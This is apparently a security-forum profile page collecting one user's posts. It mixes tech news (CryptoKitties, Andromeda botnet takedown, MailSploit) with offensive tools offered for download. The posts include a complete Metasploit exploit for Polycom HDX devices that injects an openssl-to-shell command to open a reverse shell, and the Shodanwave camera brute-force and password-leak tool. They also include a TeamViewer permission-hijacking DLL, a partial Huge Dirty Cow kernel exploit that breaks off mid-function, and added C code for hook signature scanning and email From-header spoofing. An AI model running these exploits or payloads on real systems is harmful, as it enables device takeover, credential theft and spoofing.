
Fi8sVrs
Active Members
Posts: 3206
Days Won: 87

Everything posted by Fi8sVrs

  1. A proof of concept injectable C++ dll, that uses naked inline hooking and direct memory modification to change your TeamViewer permissions.

     Features

     As the Server - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature, which is normally only active after you have already authenticated control with the client and initiated a change of control/sides.

     As the Client - Allows for control of the mouse with disregard to the server's current control settings and permissions.

     Demo

     Rundown

     Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks, a.k.a. code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes. Inject and follow the steps.

     Requirements

     Your favorite Manual Mapper, PE Loader or DLL Injector; inject into "TeamViewer.exe". This version was built on Windows 10, for TeamViewer x86 Version 13.0.5058 (other versions of TeamViewer have not been tested, but with more robust signatures it may work; Linux not supported).

     Disclaimer

     Developed for educational purposes as a proof of concept for testing. I do not condone or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse.

     Credit

     @timse93 - Research and Testing

     Download: TeamViewer_Permissions_Hook_V1-master.zip
     Source: https://github.com/gellin/TeamViewer_Permissions_Hook_V1
      • 1
      • Upvote
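The "signature/pattern scanning" step the post describes, in a portable form, as an added example that is not code from the gellin repository: a masked byte pattern is parsed from IDA-style text, scanned over a code region, required to match exactly once, and the absolute address operand of the matched mov ecx,[imm32] is read out, which is where a hook would pick up the class pointer. The sample bytes, the pattern and the function names are constructed for illustration and are not TeamViewer's.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* A masked signature: mask[i] == 1 means bytes[i] must match, 0 means wildcard. */
typedef struct {
    uint8_t bytes[64];
    uint8_t mask[64];
    size_t len;
} signature_t;

/* Parse an IDA-style pattern such as "8B 0D ? ? ? ? 85 C9": two hex digits per byte,
 * "?" or "??" for a wildcard byte. Returns 0 on success, -1 on a malformed token. */
int sig_parse(const char *text, signature_t *sig)
{
    const char *p = text;
    sig->len = 0;
    while (*p) {
        while (isspace((unsigned char)*p)) p++;
        if (!*p) break;
        if (sig->len >= sizeof sig->bytes) return -1;
        if (*p == '?') {
            sig->bytes[sig->len] = 0;
            sig->mask[sig->len] = 0;
            p += (p[1] == '?') ? 2 : 1;
        } else if (isxdigit((unsigned char)p[0]) && isxdigit((unsigned char)p[1])) {
            char hex[3] = { p[0], p[1], '\0' };
            sig->bytes[sig->len] = (uint8_t)strtoul(hex, NULL, 16);
            sig->mask[sig->len] = 1;
            p += 2;
        } else {
            return -1;
        }
        sig->len++;
        if (*p && !isspace((unsigned char)*p)) return -1;   /* tokens must be separated */
    }
    return sig->len ? 0 : -1;
}

static int sig_match_at(const uint8_t *region, size_t off, const signature_t *sig)
{
    for (size_t i = 0; i < sig->len; i++)
        if (sig->mask[i] && region[off + i] != sig->bytes[i]) return 0;
    return 1;
}

/* Number of matching positions; a signature fit for hooking must match exactly once. */
size_t sig_count(const uint8_t *region, size_t region_len, const signature_t *sig)
{
    size_t n = 0;
    if (sig->len == 0 || region_len < sig->len) return 0;
    for (size_t off = 0; off + sig->len <= region_len; off++) n += sig_match_at(region, off, sig);
    return n;
}

/* Offset of the first match, or -1. */
ptrdiff_t sig_find(const uint8_t *region, size_t region_len, const signature_t *sig)
{
    if (sig->len == 0 || region_len < sig->len) return -1;
    for (size_t off = 0; off + sig->len <= region_len; off++)
        if (sig_match_at(region, off, sig)) return (ptrdiff_t)off;
    return -1;
}

/* Parse and count in one step; returns (size_t)-1 if the pattern text is malformed. */
size_t count_pattern(const uint8_t *region, size_t region_len, const char *pattern)
{
    signature_t sig;
    if (sig_parse(pattern, &sig) != 0) return (size_t)-1;
    return sig_count(region, region_len, &sig);
}

/* Little-endian 32-bit read, e.g. the absolute address operand of mov ecx,[imm32]. */
uint32_t read_le32(const uint8_t *region, size_t off)
{
    return (uint32_t)region[off] | (uint32_t)region[off + 1] << 8 |
           (uint32_t)region[off + 2] << 16 | (uint32_t)region[off + 3] << 24;
}

/* Constructed sample code (not bytes from TeamViewer.exe):
 *   55                 push ebp
 *   8B EC              mov ebp, esp
 *   8B 0D C0 B2 A1 00  mov ecx, [0x00A1B2C0]   <- ecx now holds the class pointer
 *   85 C9              test ecx, ecx
 *   74 05 / C3         jz +5 / ret                                              */
static const uint8_t sample_code[] = {
    0x55, 0x8B, 0xEC, 0x8B, 0x0D, 0xC0, 0xB2, 0xA1, 0x00, 0x85, 0xC9, 0x74, 0x05, 0xC3
};

/* Locate the mov ecx,[imm32] that precedes the test and return the address it loads from.
 * Returns 0 if the signature is absent or ambiguous: a pattern that matches more than
 * once must never be hooked, since the hook could land in unrelated code. */
uint32_t locate_class_pointer(const uint8_t *region, size_t region_len)
{
    signature_t sig;
    if (sig_parse("8B 0D ? ? ? ? 85 C9", &sig) != 0) return 0;
    if (sig_count(region, region_len, &sig) != 1) return 0;
    ptrdiff_t off = sig_find(region, region_len, &sig);
    return read_le32(region, (size_t)off + 2);   /* +2 skips the 8B 0D opcode bytes */
}

int main(void)
{
    uint32_t addr = locate_class_pointer(sample_code, sizeof sample_code);
    if (addr == 0) { puts("signature not found or not unique"); return 1; }
    printf("class pointer is loaded from 0x%08X\n", addr);
    return 0;
}
```

The uniqueness check is the practical point: on a TeamViewer build other than 13.0.5058 a signature that matches zero or several times is the usual reason a hook lands in the wrong place, which is what the post's "more robust signatures" caveat refers to.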
  2. Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Polycom Shell HDX Series Traceroute Command Execution',
      'Description'    => %q{
        Within Polycom command shell, a command execution flaw exists in lan traceroute,
        one of the dev commands, which allows for an attacker to execute arbitrary payloads
        with telnet or openssl.
      },
      'Author'         => [
        'Mumbai',
        'staaldraad', # https://twitter.com/_staaldraad/
        'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass
        'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them
      ],
      'References'     => [
        ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/']
      ],
      'DisclosureDate' => 'Nov 12 2017',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        => [[ 'Automatic', {} ]],
      'Payload'        => {
        'Space'       => 8000,
        'DisableNops' => true,
        'Compat'      => {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'telnet generic openssl'
        }
      },
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(23),
        OptString.new('PASSWORD', [ false, "Password to access console interface if required."]),
        OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
        OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
      ])
  end

  def check
    connect
    Rex.sleep(1)
    res = sock.get_once
    disconnect
    # get_once returns nil when nothing arrived; test that before calling empty? on it
    if res.nil? || res.empty?
      return Exploit::CheckCode::Unknown
    elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service")
    end

    #
    # Obtain banner information
    #
    sock = connect
    Rex.sleep(2)
    banner = sock.get_once
    vprint_status("Received #{banner.length} bytes from service")
    vprint_line("#{banner}")

    if banner =~ /password/i
      print_status("Authentication enabled on device, authenticating with target...")
      if datastore['PASSWORD'].nil?
        print_error("#{peer} - Please supply a password to authenticate with")
        return
      end
      # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case.
      sock.put("#{datastore['PASSWORD']}\n")
      res = sock.get_once
      if res =~ /Polycom/
        print_good("#{peer} - Authenticated successfully with target.")
      elsif res =~ /failed/
        print_error("#{peer} - Invalid credentials for target.")
        return
      end
    elsif banner =~ /Polycom/ # praise jesus
      print_good("#{peer} - Device has no authentication, excellent!")
    end

    do_payload(sock)
  end

  def do_payload(sock)
    # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
    cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

    # Start a listener
    start_listener(true)

    # Figure out the port we picked
    cbport = self.service.getsockname[2]

    # ${IFS} stands in for spaces so the whole openssl command survives as one traceroute argument
    cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
    sock.put(cmd)

    if datastore['VERBOSE']
      Rex.sleep(2)
      resp = sock.get_once
      vprint_status("Received #{resp.length} bytes in response")
      vprint_line(resp)
    end

    # Give time for our command to be queued and executed
    1.upto(5) do
      Rex.sleep(1)
      break if session_created?
    end
  end

  def stage_final_payload(cli)
    print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
    cli.put(payload.encoded + "\n")
  end

  def start_listener(ssl = false)
    comm = datastore['ListenerComm']
    if comm == 'local'
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    self.service = Rex::Socket::TcpServer.create(
      'LocalPort' => datastore['CBPORT'],
      'SSL'       => ssl,
      'SSLCert'   => datastore['SSLCert'],
      'Comm'      => comm,
      'Context'   => {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    )

    self.service.on_client_connect_proc = proc { |client|
      stage_final_payload(client)
    }

    # Start the listening service
    self.service.start
  end

  # Shut down any running services
  def cleanup
    super
    if self.service
      print_status("Shutting down payload stager listener...")
      begin
        self.service.deref if self.service.is_a?(Rex::Service)
        if self.service.is_a?(Rex::Socket)
          self.service.close
          self.service.stop
        end
        self.service = nil
      rescue ::Exception
      end
    end
  end

  # Accessor for our TCP payload stager
  attr_accessor :service
end

     Source: https://packetstormsecurity.com/files/145225/Polycom-Shell-HDX-Series-Traceroute-Command-Execution.html
  3. A new craze for virtual kittens is slowing down trade in one of the largest crypto-currencies.

     CryptoKitties lets players buy and breed "crypto-pets" on Ethereum's underlying blockchain network. The game's developers told the Bloomberg news agency that CryptoKitties was a "key step" to making blockchains more accessible. But its popularity has underscored one of the technology's biggest downsides: its lack of scalability.

     Etherscan has reported a sixfold increase in pending transactions on Ethereum since the game's release, by the Axiom Zen innovation studio, on 28 November.

     "CryptoKitties has become so popular that it's taking up a significant amount of available space for transactions on the Ethereum platform," said Garrick Hileman, from the Cambridge Centre for Alternative Finance. "Some people are concerned that a frivolous game is now going to be crowding out more serious, significant-seeming business uses."

     An estimated $4.5m (£3.35m) has been spent on the cartoon cats at the time of writing, according to Crypto Kitty Sales.

     (Image caption: CryptoKitties is the first game built on Ethereum)

     What is a CryptoKitty?

     Think of these rather unpalatable cartoon kittens as unique digital Pokemon cards. The game's developers describe them as "breedable Beanie Babies", each with its own unique 256-bit genome. These crypto-collectibles are also gender-fluid, able to play the role of either the "dame" or the "sire" when bred together. The kitties' unique DNA can lead to four billion possible genetic variations. Some of the varieties created so far look lifelike, with grey striped fur and bulging green eyes. Others are speckled with neon-blue spots or magenta-patterned swirls.

     (Image caption: One of the less attractive CryptoKitties)

     How much are CryptoKitties worth?

     At the time of writing, the median, or mid-range, price of a CryptoKitty is approximately $23.06 (£17.19), according to Crypto Kitty Sales. The game's top cat brought in $117,712.12 (£87,686.11) when it sold on Saturday, 2 December.

     How can I pay for my own litter?

     CryptoKitties can be bought using only Ether, a crypto-currency that acts as the fuel of the Ethereum blockchain network. To get started, users must install a Chrome extension called MetaMask, which acts as a digital wallet and lets players send and receive Ether from their computers. Ether must be purchased from a crypto-currency exchange before it can be added to MetaMask.

     (Image caption: The sale page for a CryptoKitty)

     Where do the CryptoKitties come from?

     Axiom Zen releases a new CryptoKitty every 15 minutes, but the rest of the supply is powered by the breeding of existing crypto-pets. Owners of kittens can put them up for sale and set their own price in ethers.

     Why does it matter if CryptoKitties is slowing down Ethereum?

     According to ETH Gas Station, the CryptoKitties game accounts for over 10% of network traffic on Ethereum. As traffic increases, transactions become more expensive to execute quickly.

     "The real big issue is other major players looking for alternatives to Ethereum and moving to different systems," Mr Hileman said. "There's definitely an urgency for Ethereum to try and address this issue."

     Via bbc.com
  4. Shodanwave

     Shodanwave is a tool for exploring and obtaining information from cameras, specifically Netwave IP Camera. The tool uses a search engine called shodan that makes it easy to search for cameras online.

     What does the tool do? Look, a list!
     • Search
     • Brute force
     • SSID and WPAPSK Password Disclosure
     • E-mail, FTP, DNS, MSN Password Disclosure
     • Exploit

     This is an example of shodan wave running: the password was not found through raw force, so the tool tries to leak the camera's memory. If the tool finds the password it does not try to leak the memory.

     Demo: https://asciinema.org/a/G7gVOiReMiv43V8wlMbB4mm9B?autoplay=1

     How to use?

     To use shodanwave you need an api key, which you can get for free at https://www.shodan.io/, then you need to follow the next steps.

     Installation

     $ cd /opt/
     $ git clone https://github.com/fbctf/shodanwave.git
     $ cd shodanwave
     $ pip install -r requirements.txt

     Usage

     Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key --t OUTPUT

     python shodanwave.py --help

     This tool is successfully connected to shodan service
     Information the use of this tool is illegal, not bad.

     usage: shodanwave.py [-h] [-s SEARCH] [-u USERNAME] [-w PASSWORD] [-k ADDRESS]

     optional arguments:
       -h, --help            show this help message and exit
       -s SEARCH, --search SEARCH
                             Default Netwave IP Camera
       -u USERNAME, --username USERNAME
                             Select your usernames wordlist
       -w PASSWORD, --wordlist PASSWORD
                             Select your passwords wordlist
       -k ADDRESS, --shodan ADDRESS
                             Shodan API key
       -l LIMIT, --limit LIMIT
                             Limit the number of registers responsed by Shodan
       -o OFFSET, --offset OFFSET
                             Shodan skips this number of registers from response
       -t OUTPUT, --output OUTPUT
                             Save the results

     Attention

     Use this tool wisely and not for evil. To get the best performance of this tool you need to pay for shodan to get full API access. Options --limit and --offset may need a paying API key and consume query credits from your Shodan account.

     Disclaimer

     Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

     Download: sodanwave-master.zip
     git clone https://github.com/evilsocketbr/shodanwave.git
     Source: https://github.com/evilsocketbr/shodanwave
      • 2
      • Upvote
  5. If you receive an email that looks like it's from one of your friends, just beware! It's possible that the email has been sent by someone else in an attempt to compromise your system.

     A security researcher has discovered a collection of vulnerabilities in more than 30 popular email client applications that could allow anyone to send spoofed emails bypassing anti-spoofing mechanisms.

     Discovered by security researcher Sabri Haddouche, the set of vulnerabilities, dubbed MailSploit, affects Apple Mail (macOS, iOS, and watchOS), Mozilla Thunderbird, several Microsoft email clients, Yahoo Mail, ProtonMail, and others.

     Although most of these affected email client applications have implemented anti-spoofing mechanisms, such as DKIM and DMARC, MailSploit takes advantage of the way email clients and web interfaces parse the "From" header.

     Email spoofing is an old-school technique, but it works well, allowing someone to modify email headers and send an email with a forged sender address to trick recipients into believing they are receiving that email from a specific person.

     On a dedicated website that went up today, Haddouche explained how the lack of input sanitization implemented by vulnerable email clients could lead to an email spoofing attack, without actually exploiting any flaw in DMARC.

     To demonstrate this attack, Haddouche created a payload by encoding non-ASCII characters inside the email headers, successfully sending a spoofed email from an official address belonging to the President of the United States.

     "Using a combination of control characters such as new lines or null-byte, it can result in hiding or removing the domain part of the original email," Haddouche says in his blog post.

     "We've seen a lot of malware spreading via emails, relying on social engineering techniques to convince users to open unsafe attachments, or click on phishing links. The rise of ransomware distributed over email clearly demonstrates the effectivity of those mechanisms."

     Besides spoofing, the researcher found some of the email clients, including Hushmail, Open Mailbox, Spark, and Airmail, are also vulnerable to cross-site scripting (XSS) vulnerabilities, which stem from the email spoofing issue.

     Haddouche reported this spoofing bug to 33 different client applications, 8 of which have already patched this issue in their products before the public disclosure and 12 are on their way to fix it. Here you can find the list of all email and web clients (both patched and unpatched) that are vulnerable to the MailSploit attack.

     However, Mozilla and Opera consider this bug to be a server-side issue and will not be releasing any patch. Mailbird closed the ticket without responding to the issue, while the remaining 12 vendors did not yet comment on the researcher's report.

     Via thehackernews.com
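How the "control characters inside an encoded From header" trick quoted above truncates what a client shows, as an added example that is not Haddouche's code or payload: an RFC 2047 Q-encoded word is decoded into raw bytes, a NUL decoded from it cuts off everything a C-string API would display (including the real sending domain), and the hardened variant neutralises control bytes so the full value stays visible. The header value, the domains in it and the function names are constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample header value, not Haddouche's payload. The encoded-word decodes to
 * "potus@whitehouse.gov" followed by a NUL and a LF; the address the message really
 * comes from follows the encoded-word in plain text. */
static const char sample_from[] = "=?utf-8?Q?potus=40whitehouse=2Egov=00=0A?=@mailsploit.com";

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Decode one RFC 2047 Q-encoded word ("=?charset?Q?text?=") at src into out as raw bytes,
 * which may include NUL. Sets *endp just past the word. Returns the byte count, or -1. */
ptrdiff_t decode_q_word(const char *src, const char **endp, unsigned char *out, size_t outsz)
{
    if (strncmp(src, "=?", 2) != 0) return -1;
    const char *p = strchr(src + 2, '?');                     /* end of the charset token */
    if (!p || (p[1] != 'Q' && p[1] != 'q') || p[2] != '?') return -1;
    p += 3;
    size_t n = 0;
    while (!(p[0] == '?' && p[1] == '=')) {
        if (*p == '\0' || n >= outsz) return -1;
        if (*p == '=') {                                      /* "=XX" hex escape */
            int hi = hexval(p[1]);
            int lo = hi < 0 ? -1 : hexval(p[2]);
            if (lo < 0) return -1;
            out[n++] = (unsigned char)(hi << 4 | lo);
            p += 3;
        } else if (*p == '_') {                               /* "_" encodes a space */
            out[n++] = ' ';
            p++;
        } else {
            out[n++] = (unsigned char)*p++;
        }
    }
    *endp = p + 2;
    return (ptrdiff_t)n;
}

/* Decode a header value: encoded-words are decoded, other text is copied verbatim.
 * With strip_ctl set, control bytes produced by decoding (< 0x20 or 0x7F) become '?', so
 * they cannot truncate or reflow what the client displays. out is NUL-terminated; the
 * return value is the number of decoded bytes, which can exceed strlen(out). */
ptrdiff_t decode_header(const char *value, int strip_ctl, char *out, size_t outsz)
{
    unsigned char word[256];
    size_t n = 0;
    const char *p = value;
    while (*p) {
        if (p[0] == '=' && p[1] == '?') {
            const char *end;
            ptrdiff_t len = decode_q_word(p, &end, word, sizeof word);
            if (len < 0) return -1;
            for (ptrdiff_t i = 0; i < len; i++) {
                unsigned char c = word[i];
                if (strip_ctl && (c < 0x20 || c == 0x7F)) c = '?';
                if (n + 1 >= outsz) return -1;
                out[n++] = (char)c;
            }
            p = end;
        } else {
            if (n + 1 >= outsz) return -1;
            out[n++] = *p++;
        }
    }
    out[n] = '\0';
    return (ptrdiff_t)n;
}

/* What a client that hands the decoded buffer to C-string APIs shows: everything after
 * the embedded NUL, including the real domain, is silently dropped. */
const char *naive_display(const char *value)
{
    static char buf[512];
    return decode_header(value, 0, buf, sizeof buf) < 0 ? NULL : buf;
}

/* Hardened variant: control bytes neutralised, so the trailing real domain stays visible. */
const char *safe_display(const char *value)
{
    static char buf[512];
    return decode_header(value, 1, buf, sizeof buf) < 0 ? NULL : buf;
}

/* Number of decoded bytes, to compare with what strlen() of the naive display reports. */
ptrdiff_t decoded_byte_count(const char *value)
{
    char buf[512];
    return decode_header(value, 0, buf, sizeof buf);
}

/* The domain present in the raw, undecoded header: the text after the last '@'. */
const char *raw_domain(const char *value)
{
    const char *at = strrchr(value, '@');
    return at ? at + 1 : NULL;
}

int main(void)
{
    printf("naive client shows   : %s\n", naive_display(sample_from));
    printf("hardened client shows: %s\n", safe_display(sample_from));
    printf("decoded %ld bytes, displayed %zu; raw header domain: %s\n",
           (long)decoded_byte_count(sample_from), strlen(naive_display(sample_from)),
           raw_domain(sample_from));
    return 0;
}
```

The decoded length versus the displayed length is the tell: 37 bytes come out of the decoder, but a client that trusts strlen() shows 20 of them, and the part it drops is the only domain that appears in the raw header. Rejecting or replacing control bytes after decoding, as safe_display does, is the client-side fix the article describes as missing input sanitization.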
  6. In this advanced project with the GoPiGo3 we build a browser video streaming robot which streams live video to a browser and can be controlled from the browser. In this project we use the Raspberry Pi Camera module with the GoPiGo3. You can control the robot using a controller in the browser as the live video streams directly to the browser. The video quality is very good and the latency of the video is low, making this ideal for live video streaming robot projects.

     Hardware Needed
     • A fully assembled GoPiGo3
     • A Raspberry Pi
     • A Raspberry Pi Camera Module

     Connecting the Camera module

     Attach the Raspberry Pi camera module to the port on the Raspberry Pi. For more details on how to attach the camera, see our tutorial here.

     Setting up the GoPiGo Video Streaming Robot

     You should have cloned the GoPiGo3 github code onto your Raspberry Pi. Install the Pi Camera dependencies and Flask by running the install.sh script:

     sudo bash install.sh

     Reboot your Pi.

     Setup to Run on Boot

     You can run the server on boot so you don't have to run it manually. Use the command install_startup.sh and this should start the flask server on boot. You should be able to connect to the robot using "http://dex.local:5000" or, if using the Cinch setup, you can use "http://10.10.10.10:5000".

     You can set up Cinch, which will automatically set up a wifi access point, with the command:

     sudo bash /home/pi/di_update/Raspbian_For_Robots/upd_script/wifi/cinch_setup.sh

     On reboot, connect to the WiFi service "Dex".

     Running the Project

     Start the server by typing the following command:

     sudo python3 flask_server.py

     It's going to take a couple of seconds for the server to fire up. A port and address will be shown there. By default, the port is set to 5000. If you have Raspbian For Robots installed, then going to the http://dex.local:5000 address will be enough. Be sure you have your mobile device / laptop on the same network as your GoPiGo3, otherwise you won't be able to access it.

     Source: https://www.dexterindustries.com/GoPiGo/projects/python-examples-for-the-raspberry-pi/browser-video-streaming-robot-gopigo3/
  7. Still using FTP? Truck hauls data 30x faster thanks to its modern rsync engine (included) which compresses, de-duplicates and encrypts – giving significantly higher performance and security, right from the first transfer. Setup takes 3 clicks (no command line), then just drag-and-drop to transfer. Unlock the performance of rsync with the simplicity of Truck.

     Benchmarks
     – 18x faster – uploading a new installation of WordPress.
     – 30x faster – downloading a used instance of WordPress.
     – 12x faster – sending an app to another computer in the office.

     No data was pre-existing at the destination, these were all first-time transfers – all gains are thanks to rsync's compression and de-duplication. Comparisons were made versus the fastest FTP and SFTP apps for Mac, and native SMB sharing.

     Features
     – Upload and download via rsync by dragging-and-dropping.
     – Browse, rename, copy, move and delete remote files very quickly and easily.
     – Works over a securely encrypted SSH tunnel (no setup required).
     – Includes rsync 3.1.2 (no command-line interaction required).
     – Connects to any remote machine.
     – Checkboxes to quickly enable rsync's most powerful features – such as backups/version-controlling, bandwidth-management, retention of partial transfers, etc.
     – Push-update the remote system's version of rsync (includes precompiled binaries to suit a variety of remote machines).
     – Advanced GUI controls to selectively tune over 125 other rsync options. Even application-defined defaults can be overridden for a near-command-line level of control.
     – Autocompletion and inline documentation provided for each option.
     – Specify when the option applies (e.g. when uploading/downloading/both).
     – Enable 'scavenging': a preference to boost transfers by systematically employing rsync's --copy-dest option; essentially reusing data from existing files in recently-visited directories. Fuzzy matching means that even files that are non-identical can be used as a basis for boosting.
     – Filter rules to include/exclude items based on text matching (or advanced pattern matching).
     – Toggle visibility of hidden files.
     – Specify 'initial paths' – for connecting straight into the given directory.
     – Fine tune custom preferences for each direction (upload/download) for each server.
     – Save multiple Favourites and work with multiple servers in multiple windows.
     – Bonjour browsing to easily connect to servers found nearby.
     – Use your SSH RSA private key instead of a password to connect to AWS, Google Cloud, etc.
     – An 'Open Terminal Here' action to quickly jump into an SSH session in Terminal.app – pre-authenticated and ready in the right directory.
     – Detailed operation logging.
     – Filter any view of files and use the keyboard to navigate.

     Certified for use with:
     – Google Cloud.
     – Amazon AWS.
     – Dreamhost.
     – (And works with any other service provider offering standard rsync-over-SSH.)

     Other features in the pipe:
     – Native rsync protocol support (in addition to the current rsync-over-ssh).
     – Scheduled transfers.
     – A 'get info' panel with full support for ownership and permissions management.
     – A history panel with granular operation logging.

     System Requirements
     Compatible with:
     – Mac OS X 10.8 (Mountain Lion and Mountain Lion Server)
     – Mac OS X 10.9 (Mavericks and Mavericks Server)
     – Mac OS X 10.10 (Yosemite and Yosemite Server)
     – Mac OS X 10.11 (El Capitan and El Capitan Server)
     – macOS 10.12 (Sierra and Sierra Server)
     – macOS 10.13 (High Sierra and High Sierra Server)

     The remote machine must have a running SSH service and carry its own copy of rsync. Macs have this as standard. Therefore, to connect to a remote Mac, simply enable 'Remote Login' in its System Preferences.

     Download (21MB) – free trial included.
     Source: http://bonhardcomputing.com/truck/#2017-12-04
  8. Black Friday

     https://n0where.net/all-the-best-cyber-monday-black-friday-deals/
  9. On 29 November 2017, the Federal Bureau of Investigation (FBI), in close cooperation with the Luneburg Central Criminal Investigation Inspectorate in Germany, Europol's European Cybercrime Centre (EC3), the Joint Cybercrime Action Task Force (J-CAT), Eurojust and private-sector partners, dismantled one of the longest running malware families in existence called Andromeda (also known as Gamarue). This widely distributed malware created a network of infected computers called the Andromeda botnet[1].

     According to Microsoft, Andromeda's main goal was to distribute other malware families. Andromeda was associated with 80 malware families and, in the last six months, it was detected on or blocked an average of over 1 million machines every month. Andromeda was also used in the infamous Avalanche network, which was dismantled in a huge international cyber operation in 2016.

     Steven Wilson, the Head of Europol's European Cybercrime Centre: "This is another example of international law enforcement working together with industry partners to tackle the most significant cyber criminals and the dedicated infrastructure they use to distribute malware on a global scale. The clear message is that public-private partnerships can impact these criminals and make the internet safer for all of us."

     One year ago, on 30 November 2016, after more than four years of investigation, the Public Prosecutor's Office Verden and the Luneburg Police in Germany, the United States Attorney's Office for the Western District of Pennsylvania, the Department of Justice, the FBI, Europol, Eurojust and global partners, had dismantled the international criminal infrastructure Avalanche. This was used as a delivery platform to launch and manage mass global malware attacks such as Andromeda, and money mule recruitment campaigns.

     Insights gained during the Avalanche case by the investigating German law enforcement entities were shared, via Europol, with the FBI and supported this year's investigations to dismantle the Andromeda malware last week.

     Jointly, the international partners took action against servers and domains, which were used to spread the Andromeda malware. Overall, 1500 domains of the malicious software were subject to sinkholing[2]. According to Microsoft, during 48 hours of sinkholing, approximately 2 million unique Andromeda victim IP addresses from 223 countries were captured. The involved law enforcement authorities also executed the search and arrest of a suspect in Belarus.

     Simultaneously, the German sinkhole measures of the Avalanche case have been extended by another year. An extension of this measure was necessary, as globally 55 per cent of the computer systems originally infected in Avalanche are still infected today.

     The measures to combat the malicious Andromeda software as well as the extension of the Avalanche measures involved the following EU Member States: Austria, Belgium, Finland, France, Italy, the Netherlands, Poland, Spain, the United Kingdom, and the following non-EU Member States: Australia, Belarus, Canada, Montenegro, Singapore and Taiwan.

     The operation was supported by the following private and institutional partners: Shadowserver Foundation, Microsoft, Registrar of Last Resort, Internet Corporation for Assigned Names and Numbers (ICANN) and associated domain registries, Fraunhofer Institute for Communication, Information Processing and Ergonomics (FKIE), and the German Federal Office for Information Security (BSI). The operation was coordinated from the command post hosted at Europol's HQ.

     [1] Botnets are networks of computers infected with malware, which are under the control of a cybercriminal. Botnets allow criminals to harvest sensitive information from infected computers, such as online banking credentials and credit card information. A criminal can also use a botnet to perform cyberattacks on other computer systems, such as denial-of-service attacks.

     [2] Sinkholing is an action whereby traffic between infected computers and a criminal infrastructure is redirected to servers controlled by law enforcement authorities and/or an IT security company. This may be done by assuming control of the domains used by the criminals or IP addresses. When employed at a 100% scale, infected computers can no longer reach the criminal command-and-control computer systems and criminals can therefore no longer control the infected computers. The sinkholing infrastructure captures victims' IP addresses, which can subsequently be used for notification and follow-up through dissemination to National CERTs and network owners.

     Crime areas: Cybercrime; Forgery of Administrative Documents and Trafficking therein
     Source: Europol newsroom
  10. "Huge Dirty Cow" POC

     A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405). Full details can be found here.

     Before running, make sure to set transparent huge pages to "always":

     echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled

     Download HugeDirtyCowPOC-master.zip

     mirror:

//
// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.
// Compile with "gcc -pthread main.c"
//
// November 2017
// Bindecy
//

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <string.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>

#define MAP_BASE        ((void *)0x4000000)
#define MAP_SIZE        (0x200000)
#define MEMESET_VAL     (0x41)
#define PAGE_SIZE       (0x1000)
#define TRIES_PER_PAGE  (20000000)

struct thread_args {
    char *thp_map;
    char *thp_chk_map;
    off_t off;
    char *buf_to_write;
    int stop;
    int mem_fd1;
    int mem_fd2;
};

typedef void * (*pthread_proc)(void *);

void *unmap_and_read_thread(struct thread_args *args)
{
    char c;
    int i;

    for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {
        madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.
        memcpy(&c, args->thp_map + args->off, sizeof(c));
        read(args->mem_fd2, &c, sizeof(c));
        lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);
        usleep(10); // We placed the zero page and marked its PMD as dirty.
                    // Give get_user_pages() another chance before madvise()-ing again.
    }

    return NULL;
}

void *write_thread(struct thread_args *args)
{
    int i;

    for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {
